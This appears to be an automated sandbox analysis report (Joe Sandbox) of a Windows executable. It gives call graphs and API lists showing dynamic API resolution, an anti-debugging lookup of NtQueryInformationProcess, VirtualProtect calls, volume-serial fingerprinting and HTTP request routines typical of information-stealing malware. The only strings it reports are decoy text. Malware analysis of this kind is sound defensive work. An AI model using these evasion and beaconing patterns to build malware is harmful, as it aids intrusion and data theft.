4c4610 2 API calls 37110->37111 37112 4c3ed8 37111->37112 37113 4c4610 2 API calls 37112->37113 37114 4c3ef1 37113->37114 37115 4c4610 2 API calls 37114->37115 37116 4c3f0a 37115->37116 37117 4c4610 2 API calls 37116->37117 37118 4c3f23 37117->37118 37119 4c4610 2 API calls 37118->37119 37120 4c3f3c 37119->37120 37121 4c4610 2 API calls 37120->37121 37122 4c3f55 37121->37122 37123 4c4610 2 API calls 37122->37123 37124 4c3f6e 37123->37124 37125 4c4610 2 API calls 37124->37125 37126 4c3f87 37125->37126 37127 4c4610 2 API calls 37126->37127 37128 4c3fa0 37127->37128 37129 4c4610 2 API calls 37128->37129 37130 4c3fb9 37129->37130 37131 4c4610 2 API calls 37130->37131 37132 4c3fd2 37131->37132 37133 4c4610 2 API calls 37132->37133 37134 4c3feb 37133->37134 37135 4c4610 2 API calls 37134->37135 37136 4c4004 37135->37136 37137 4c4610 2 API calls 37136->37137 37138 4c401d 37137->37138 37139 4c4610 2 API calls 37138->37139 37140 4c4036 37139->37140 37141 4c4610 2 API calls 37140->37141 37142 4c404f 37141->37142 37143 4c4610 2 API calls 37142->37143 37144 4c4068 37143->37144 37145 4c4610 2 API calls 37144->37145 37146 4c4081 37145->37146 37147 4c4610 2 API calls 37146->37147 37148 4c409a 37147->37148 37149 4c4610 2 API calls 37148->37149 37150 4c40b3 37149->37150 37151 4c4610 2 API calls 37150->37151 37152 4c40cc 37151->37152 37153 4c4610 2 API calls 37152->37153 37154 4c40e5 37153->37154 37155 4c4610 2 API calls 37154->37155 37156 4c40fe 37155->37156 37157 4c4610 2 API calls 37156->37157 37158 4c4117 37157->37158 37159 4c4610 2 API calls 37158->37159 37160 4c4130 37159->37160 37161 4c4610 2 API calls 37160->37161 37162 4c4149 37161->37162 37163 4c4610 2 API calls 37162->37163 37164 4c4162 37163->37164 37165 4c4610 2 API calls 37164->37165 37166 4c417b 37165->37166 37167 4c4610 2 API calls 37166->37167 37168 4c4194 37167->37168 37169 4c4610 2 API calls 37168->37169 37170 4c41ad 37169->37170 37171 4c4610 2 API calls 37170->37171 37172 4c41c6 37171->37172 37173 4c4610 2 API calls 37172->37173 37174 4c41df 37173->37174 37175 4c4610 2 API calls 37174->37175 37176 4c41f8 37175->37176 37177 4c4610 2 API calls 37176->37177 37178 4c4211 37177->37178 37179 4c4610 2 API calls 37178->37179 37180 4c422a 37179->37180 37181 4c4610 2 API calls 37180->37181 37182 4c4243 37181->37182 37183 4c4610 2 API calls 37182->37183 37184 4c425c 37183->37184 37185 4c4610 2 API calls 37184->37185 37186 4c4275 37185->37186 37187 4c4610 2 API calls 37186->37187 37188 4c428e 37187->37188 37189 4c4610 2 API calls 37188->37189 37190 4c42a7 37189->37190 37191 4c4610 2 API calls 37190->37191 37192 4c42c0 37191->37192 37193 4c4610 2 API calls 37192->37193 37194 4c42d9 37193->37194 37195 4c4610 2 API calls 37194->37195 37196 4c42f2 37195->37196 37197 4c4610 2 API calls 37196->37197 37198 4c430b 37197->37198 37199 4c4610 2 API calls 37198->37199 37200 4c4324 37199->37200 37201 4c4610 2 API calls 37200->37201 37202 4c433d 37201->37202 37203 4c4610 2 API calls 37202->37203 37204 4c4356 37203->37204 37205 4c4610 2 API calls 37204->37205 37206 4c436f 37205->37206 37207 4c4610 2 API calls 37206->37207 37208 4c4388 37207->37208 37209 4c4610 2 API calls 37208->37209 37210 4c43a1 37209->37210 37211 4c4610 2 API calls 37210->37211 37212 4c43ba 37211->37212 37213 4c4610 2 API calls 37212->37213 37214 4c43d3 37213->37214 37215 4c4610 2 API calls 37214->37215 37216 4c43ec 37215->37216 37217 4c4610 2 API calls 37216->37217 37218 4c4405 37217->37218 37219 4c4610 2 API calls 37218->37219 37220 4c441e 37219->37220 37221 4c4610 2 API calls 37220->37221 37222 4c4437 37221->37222 37223 4c4610 2 API calls 37222->37223 37224 4c4450 37223->37224 37225 4c4610 2 API calls 37224->37225 37226 4c4469 37225->37226 37227 4c4610 2 API calls 37226->37227 37228 4c4482 37227->37228 37229 4c4610 2 API calls 37228->37229 37230 4c449b 37229->37230 37231 4c4610 2 API calls 37230->37231 37232 4c44b4 37231->37232 37233 4c4610 2 API calls 37232->37233 37234 4c44cd 37233->37234 37235 4c4610 2 API calls 37234->37235 37236 4c44e6 37235->37236 37237 4c4610 2 API calls 37236->37237 37238 4c44ff 37237->37238 37239 4c4610 2 API calls 37238->37239 37240 4c4518 37239->37240 37241 4c4610 2 API calls 37240->37241 37242 4c4531 37241->37242 37243 4c4610 2 API calls 37242->37243 37244 4c454a 37243->37244 37245 4c4610 2 API calls 37244->37245 37246 4c4563 37245->37246 37247 4c4610 2 API calls 37246->37247 37248 4c457c 37247->37248 37249 4c4610 2 API calls 37248->37249 37250 4c4595 37249->37250 37251 4c4610 2 API calls 37250->37251 37252 4c45ae 37251->37252 37253 4c4610 2 API calls 37252->37253 37254 4c45c7 37253->37254 37255 4c4610 2 API calls 37254->37255 37256 4c45e0 37255->37256 37257 4c4610 2 API calls 37256->37257 37258 4c45f9 37257->37258 37259 4d9f20 37258->37259 37260 4da346 8 API calls 37259->37260 37261 4d9f30 43 API calls 37259->37261 37262 4da3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37260->37262 37263 4da456 37260->37263 37261->37260 37262->37263 37264 4da526 37263->37264 37265 4da463 8 API calls 37263->37265 37266 4da52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37264->37266 37267 4da5a8 37264->37267 37265->37264 37266->37267 37268 4da5b5 6 API calls 37267->37268 37269 4da647 37267->37269 37268->37269 37270 4da72f 37269->37270 37271 4da654 9 API calls 37269->37271 37272 4da738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37270->37272 37273 4da7b2 37270->37273 37271->37270 37272->37273 37274 4da7ec 37273->37274 37275 4da7bb GetProcAddress GetProcAddress 37273->37275 37276 4da825 37274->37276 37277 4da7f5 GetProcAddress GetProcAddress 37274->37277 37275->37274 37278 4da922 37276->37278 37279 4da832 10 API calls 37276->37279 37277->37276 37280 4da98d 37278->37280 37281 4da92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37278->37281 37279->37278 37282 4da9ae 37280->37282 37283 4da996 GetProcAddress 37280->37283 37281->37280 37284 4d5ef3 37282->37284 37285 4da9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37282->37285 37283->37282 37286 4c1590 37284->37286 37285->37284 37556 4c16b0 37286->37556 37289 4daab0 lstrcpy 37290 4c15b5 37289->37290 37291 4daab0 lstrcpy 37290->37291 37292 4c15c7 37291->37292 37293 4daab0 lstrcpy 37292->37293 37294 4c15d9 37293->37294 37295 4daab0 lstrcpy 37294->37295 37296 4c1663 37295->37296 37297 4d5760 37296->37297 37298 4d5771 37297->37298 37299 4dab30 2 API calls 37298->37299 37300 4d577e 37299->37300 37301 4dab30 2 API calls 37300->37301 37302 4d578b 37301->37302 37303 4dab30 2 API calls 37302->37303 37304 4d5798 37303->37304 37305 4daa50 lstrcpy 37304->37305 37306 4d57a5 37305->37306 37307 4daa50 lstrcpy 37306->37307 37308 4d57b2 37307->37308 37309 4daa50 lstrcpy 37308->37309 37310 4d57bf 37309->37310 37311 4daa50 lstrcpy 37310->37311 37350 4d57cc 37311->37350 37312 4daa50 lstrcpy 37312->37350 37313 4d5510 25 API calls 37313->37350 37314 4d5440 20 API calls 37314->37350 37315 4d5893 StrCmpCA 37315->37350 37316 4d58f0 StrCmpCA 37317 4d5a2c 37316->37317 37316->37350 37318 4dabb0 lstrcpy 37317->37318 37319 4d5a38 37318->37319 37320 4dab30 2 API calls 37319->37320 37322 4d5a46 37320->37322 37321 4d5aa6 StrCmpCA 37323 4d5be1 37321->37323 37321->37350 37324 4dab30 2 API calls 37322->37324 37325 4dabb0 lstrcpy 37323->37325 37326 4d5a55 37324->37326 37328 4d5bed 37325->37328 37327 4c16b0 lstrcpy 37326->37327 37349 4d5a61 37327->37349 37330 4dab30 2 API calls 37328->37330 37329 4dab30 lstrlen lstrcpy 37329->37350 37332 4d5bfb 37330->37332 37331 4d5c5b StrCmpCA 37333 4d5c78 37331->37333 37334 4d5c66 Sleep 37331->37334 37336 4dab30 2 API calls 37332->37336 37338 4dabb0 lstrcpy 37333->37338 37334->37350 37335 4daab0 lstrcpy 37335->37350 37337 4d5c0a 37336->37337 37339 4c16b0 lstrcpy 37337->37339 37340 4d5c84 37338->37340 37339->37349 37341 4dab30 2 API calls 37340->37341 37342 4d5c93 37341->37342 37343 4dab30 2 API calls 37342->37343 37344 4d5ca2 37343->37344 37346 4c16b0 lstrcpy 37344->37346 37345 4d59da StrCmpCA 37345->37350 37346->37349 37347 4d5b8f StrCmpCA 37347->37350 37348 4c1590 lstrcpy 37348->37350 37349->36404 37350->37312 37350->37313 37350->37314 37350->37315 37350->37316 37350->37321 37350->37329 37350->37331 37350->37335 37350->37345 37350->37347 37350->37348 37351 4dabb0 lstrcpy 37350->37351 37351->37350 37353 4d76dc 37352->37353 37354 4d76e3 GetVolumeInformationA 37352->37354 37353->37354 37355 4d7721 37354->37355 37356 4d778c GetProcessHeap RtlAllocateHeap 37355->37356 37357 4d77a9 37356->37357 37358 4d77b8 wsprintfA 37356->37358 37359 4daa50 lstrcpy 37357->37359 37360 4daa50 lstrcpy 37358->37360 37361 4d5ff7 37359->37361 37360->37361 37361->36425 37363 4daab0 lstrcpy 37362->37363 37364 4c48e9 37363->37364 37565 4c4800 37364->37565 37366 4c48f5 37367 4daa50 lstrcpy 37366->37367 37368 4c4927 37367->37368 37369 4daa50 lstrcpy 37368->37369 37370 4c4934 37369->37370 37371 4daa50 lstrcpy 37370->37371 37372 4c4941 37371->37372 37373 4daa50 lstrcpy 37372->37373 37374 4c494e 37373->37374 37375 4daa50 lstrcpy 37374->37375 37376 4c495b InternetOpenA StrCmpCA 37375->37376 37377 4c4994 37376->37377 37378 4c4f1b InternetCloseHandle 37377->37378 37571 4d8cf0 37377->37571 37380 4c4f38 37378->37380 37586 4ca210 CryptStringToBinaryA 37380->37586 37381 4c49b3 37579 4dac30 37381->37579 37384 4c49c6 37386 4dabb0 lstrcpy 37384->37386 37391 4c49cf 37386->37391 37387 4dab30 2 API calls 37388 4c4f55 37387->37388 37390 4dacc0 4 API calls 37388->37390 37389 4c4f77 ctype 37393 4daab0 lstrcpy 37389->37393 37392 4c4f6b 37390->37392 37395 4dacc0 4 API calls 37391->37395 37394 4dabb0 lstrcpy 37392->37394 37406 4c4fa7 37393->37406 37394->37389 37396 4c49f9 37395->37396 37397 4dabb0 lstrcpy 37396->37397 37398 4c4a02 37397->37398 37399 4dacc0 4 API calls 37398->37399 37400 4c4a21 37399->37400 37401 4dabb0 lstrcpy 37400->37401 37402 4c4a2a 37401->37402 37403 4dac30 3 API calls 37402->37403 37404 4c4a48 37403->37404 37405 4dabb0 lstrcpy 37404->37405 37407 4c4a51 37405->37407 37406->36428 37408 4dacc0 4 API calls 37407->37408 37409 4c4a70 37408->37409 37410 4dabb0 lstrcpy 37409->37410 37411 4c4a79 37410->37411 37412 4dacc0 4 API calls 37411->37412 37413 4c4a98 37412->37413 37414 4dabb0 lstrcpy 37413->37414 37415 4c4aa1 37414->37415 37416 4dacc0 4 API calls 37415->37416 37417 4c4acd 37416->37417 37418 4dac30 3 API calls 37417->37418 37419 4c4ad4 37418->37419 37420 4dabb0 lstrcpy 37419->37420 37421 4c4add 37420->37421 37422 4c4af3 InternetConnectA 37421->37422 37422->37378 37423 4c4b23 HttpOpenRequestA 37422->37423 37425 4c4f0e InternetCloseHandle 37423->37425 37426 4c4b78 37423->37426 37425->37378 37427 4dacc0 4 API calls 37426->37427 37428 4c4b8c 37427->37428 37429 4dabb0 lstrcpy 37428->37429 37430 4c4b95 37429->37430 37431 4dac30 3 API calls 37430->37431 37432 4c4bb3 37431->37432 37433 4dabb0 lstrcpy 37432->37433 37434 4c4bbc 37433->37434 37435 4dacc0 4 API calls 37434->37435 37436 4c4bdb 37435->37436 37437 4dabb0 lstrcpy 37436->37437 37438 4c4be4 37437->37438 37439 4dacc0 4 API calls 37438->37439 37440 4c4c05 37439->37440 37441 4dabb0 lstrcpy 37440->37441 37442 4c4c0e 37441->37442 37443 4dacc0 4 API calls 37442->37443 37444 4c4c2e 37443->37444 37445 4dabb0 lstrcpy 37444->37445 37446 4c4c37 37445->37446 37447 4dacc0 4 API calls 37446->37447 37448 4c4c56 37447->37448 37449 4dabb0 lstrcpy 37448->37449 37450 4c4c5f 37449->37450 37451 4dac30 3 API calls 37450->37451 37452 4c4c7d 37451->37452 37453 4dabb0 lstrcpy 37452->37453 37454 4c4c86 37453->37454 37455 4dacc0 4 API calls 37454->37455 37456 4c4ca5 37455->37456 37457 4dabb0 lstrcpy 37456->37457 37458 4c4cae 37457->37458 37459 4dacc0 4 API calls 37458->37459 37460 4c4ccd 37459->37460 37461 4dabb0 lstrcpy 37460->37461 37462 4c4cd6 37461->37462 37463 4dac30 3 API calls 37462->37463 37464 4c4cf4 37463->37464 37465 4dabb0 lstrcpy 37464->37465 37466 4c4cfd 37465->37466 37467 4dacc0 4 API calls 37466->37467 37468 4c4d1c 37467->37468 37469 4dabb0 lstrcpy 37468->37469 37470 4c4d25 37469->37470 37471 4dacc0 4 API calls 37470->37471 37472 4c4d46 37471->37472 37473 4dabb0 lstrcpy 37472->37473 37474 4c4d4f 37473->37474 37475 4dacc0 4 API calls 37474->37475 37476 4c4d6f 37475->37476 37477 4dabb0 lstrcpy 37476->37477 37478 4c4d78 37477->37478 37479 4dacc0 4 API calls 37478->37479 37480 4c4d97 37479->37480 37481 4dabb0 lstrcpy 37480->37481 37482 4c4da0 37481->37482 37483 4dac30 3 API calls 37482->37483 37484 4c4dbe 37483->37484 37485 4dabb0 lstrcpy 37484->37485 37486 4c4dc7 37485->37486 37487 4daa50 lstrcpy 37486->37487 37488 4c4de2 37487->37488 37489 4dac30 3 API calls 37488->37489 37490 4c4e03 37489->37490 37491 4dac30 3 API calls 37490->37491 37492 4c4e0a 37491->37492 37493 4dabb0 lstrcpy 37492->37493 37494 4c4e16 37493->37494 37495 4c4e37 lstrlen 37494->37495 37496 4c4e4a 37495->37496 37497 4c4e53 lstrlen 37496->37497 37585 4dade0 37497->37585 37499 4c4e63 HttpSendRequestA 37500 4c4e82 InternetReadFile 37499->37500 37501 4c4eb7 InternetCloseHandle 37500->37501 37506 4c4eae 37500->37506 37503 4dab10 37501->37503 37503->37425 37504 4dacc0 4 API calls 37504->37506 37505 4dabb0 lstrcpy 37505->37506 37506->37500 37506->37501 37506->37504 37506->37505 37592 4dade0 37507->37592 37509 4d1a14 StrCmpCA 37510 4d1a1f ExitProcess 37509->37510 37511 4d1a27 37509->37511 37512 4d1c12 37511->37512 37513 4d1aad StrCmpCA 37511->37513 37514 4d1acf StrCmpCA 37511->37514 37515 4d1b41 StrCmpCA 37511->37515 37516 4d1ba1 StrCmpCA 37511->37516 37517 4d1bc0 StrCmpCA 37511->37517 37518 4d1b63 StrCmpCA 37511->37518 37519 4d1b82 StrCmpCA 37511->37519 37520 4d1afd StrCmpCA 37511->37520 37521 4d1b1f StrCmpCA 37511->37521 37522 4dab30 lstrlen lstrcpy 37511->37522 37512->36430 37513->37511 37514->37511 37515->37511 37516->37511 37517->37511 37518->37511 37519->37511 37520->37511 37521->37511 37522->37511 37523->36436 37524->36438 37525->36444 37526->36446 37527->36452 37528->36454 37529->36458 37530->36462 37531->36466 37532->36472 37533->36474 37534->36478 37535->36492 37536->36496 37537->36495 37538->36491 37539->36495 37540->36513 37541->36498 37542->36500 37543->36504 37544->36509 37545->36510 37546->36517 37547->36520 37548->36526 37549->36548 37550->36553 37551->36552 37552->36549 37553->36552 37554->36562 37557 4daab0 lstrcpy 37556->37557 37558 4c16c3 37557->37558 37559 4daab0 lstrcpy 37558->37559 37560 4c16d5 37559->37560 37561 4daab0 lstrcpy 37560->37561 37562 4c16e7 37561->37562 37563 4daab0 lstrcpy 37562->37563 37564 4c15a3 37563->37564 37564->37289 37566 4c4816 37565->37566 37567 4c4888 lstrlen 37566->37567 37591 4dade0 37567->37591 37569 4c4898 InternetCrackUrlA 37570 4c48b7 37569->37570 37570->37366 37572 4daa50 lstrcpy 37571->37572 37573 4d8d04 37572->37573 37574 4daa50 lstrcpy 37573->37574 37575 4d8d12 GetSystemTime 37574->37575 37576 4d8d29 37575->37576 37577 4daab0 lstrcpy 37576->37577 37578 4d8d8c 37577->37578 37578->37381 37580 4dac41 37579->37580 37581 4dac98 37580->37581 37583 4dac78 lstrcpy lstrcat 37580->37583 37582 4daab0 lstrcpy 37581->37582 37584 4daca4 37582->37584 37583->37581 37584->37384 37585->37499 37587 4ca249 LocalAlloc 37586->37587 37588 4c4f3e 37586->37588 37587->37588 37589 4ca264 CryptStringToBinaryA 37587->37589 37588->37387 37588->37389 37589->37588 37590 4ca289 LocalFree 37589->37590 37590->37588 37591->37569 37592->37509

                              Executed Functions

                              Function 004D9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 4d9bb0-4d9bc4 call 4d9aa0 663 4d9bca-4d9dde call 4d9ad0 GetProcAddress * 21 660->663 664 4d9de3-4d9e42 LoadLibraryA * 5 660->664 663->664 665 4d9e5d-4d9e64 664->665 666 4d9e44-4d9e58 GetProcAddress 664->666 669 4d9e96-4d9e9d 665->669 670 4d9e66-4d9e91 GetProcAddress * 2 665->670 666->665 671 4d9e9f-4d9eb3 GetProcAddress 669->671 672 4d9eb8-4d9ebf 669->672 670->669 671->672 673 4d9ed9-4d9ee0 672->673 674 4d9ec1-4d9ed4 GetProcAddress 672->674 675 4d9f11-4d9f12 673->675 676 4d9ee2-4d9f0c GetProcAddress * 2 673->676 674->673 676->675
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,012A24D0), ref: 004D9BF1
                              • GetProcAddress.KERNEL32(74DD0000,012A24E8), ref: 004D9C0A
                              • GetProcAddress.KERNEL32(74DD0000,012A2248), ref: 004D9C22
                              • GetProcAddress.KERNEL32(74DD0000,012A2350), ref: 004D9C3A
                              • GetProcAddress.KERNEL32(74DD0000,012A2230), ref: 004D9C53
                              • GetProcAddress.KERNEL32(74DD0000,012A9158), ref: 004D9C6B
                              • GetProcAddress.KERNEL32(74DD0000,01295DB0), ref: 004D9C83
                              • GetProcAddress.KERNEL32(74DD0000,01295B10), ref: 004D9C9C
                              • GetProcAddress.KERNEL32(74DD0000,012A22F0), ref: 004D9CB4
                              • GetProcAddress.KERNEL32(74DD0000,012A23C8), ref: 004D9CCC
                              • GetProcAddress.KERNEL32(74DD0000,012A2338), ref: 004D9CE5
                              • GetProcAddress.KERNEL32(74DD0000,012A2380), ref: 004D9CFD
                              • GetProcAddress.KERNEL32(74DD0000,01295B30), ref: 004D9D15
                              • GetProcAddress.KERNEL32(74DD0000,012A23E0), ref: 004D9D2E
                              • GetProcAddress.KERNEL32(74DD0000,012A23F8), ref: 004D9D46
                              • GetProcAddress.KERNEL32(74DD0000,01295E10), ref: 004D9D5E
                              • GetProcAddress.KERNEL32(74DD0000,012A2428), ref: 004D9D77
                              • GetProcAddress.KERNEL32(74DD0000,012A2440), ref: 004D9D8F
                              • GetProcAddress.KERNEL32(74DD0000,01295C10), ref: 004D9DA7
                              • GetProcAddress.KERNEL32(74DD0000,012A2470), ref: 004D9DC0
                              • GetProcAddress.KERNEL32(74DD0000,01295CF0), ref: 004D9DD8
                              • LoadLibraryA.KERNEL32(012A2548,?,004D6CA0), ref: 004D9DEA
                              • LoadLibraryA.KERNEL32(012A25D8,?,004D6CA0), ref: 004D9DFB
                              • LoadLibraryA.KERNEL32(012A2578,?,004D6CA0), ref: 004D9E0D
                              • LoadLibraryA.KERNEL32(012A2560,?,004D6CA0), ref: 004D9E1F
                              • LoadLibraryA.KERNEL32(012A2590,?,004D6CA0), ref: 004D9E30
                              • GetProcAddress.KERNEL32(75A70000,012A25A8), ref: 004D9E52
                              • GetProcAddress.KERNEL32(75290000,012A25C0), ref: 004D9E73
                              • GetProcAddress.KERNEL32(75290000,012A2530), ref: 004D9E8B
                              • GetProcAddress.KERNEL32(75BD0000,012A2518), ref: 004D9EAD
                              • GetProcAddress.KERNEL32(75450000,01295AB0), ref: 004D9ECE
                              • GetProcAddress.KERNEL32(76E90000,012A91A8), ref: 004D9EEF
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004D9F06
                              Strings
                              • NtQueryInformationProcess, xrefs: 004D9EFA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 2f9dd76fbf84725f7764a139c23be03009d263c95cb7f1bf37cf72c55a91a457
                              • Instruction ID: 035b2d785418aa4f0086af906a05349ae5a4022510adf4e7350344c19a1a1c56
                              • Opcode Fuzzy Hash: 2f9dd76fbf84725f7764a139c23be03009d263c95cb7f1bf37cf72c55a91a457
                              • Instruction Fuzzy Hash: 1EA10DB55782049FC348DFA9EC9895677B9BB8E701710C61BB909C3274D73CA942CB6C
                              Function 004C4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 4c4610-4c46e5 RtlAllocateHeap 781 4c46f0-4c46f6 764->781 782 4c46fc-4c479a 781->782 783 4c479f-4c47f9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C465E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004C47EC
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C476E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C47CB
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4728
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46C8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4784
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46D3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C47B5
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46BD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C479F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46B2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C47C0
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4707
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4672
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4763
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C478F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4688
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C467D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4779
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4667
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46FC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4693
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C47AA
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4712
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C471D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004C46A7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
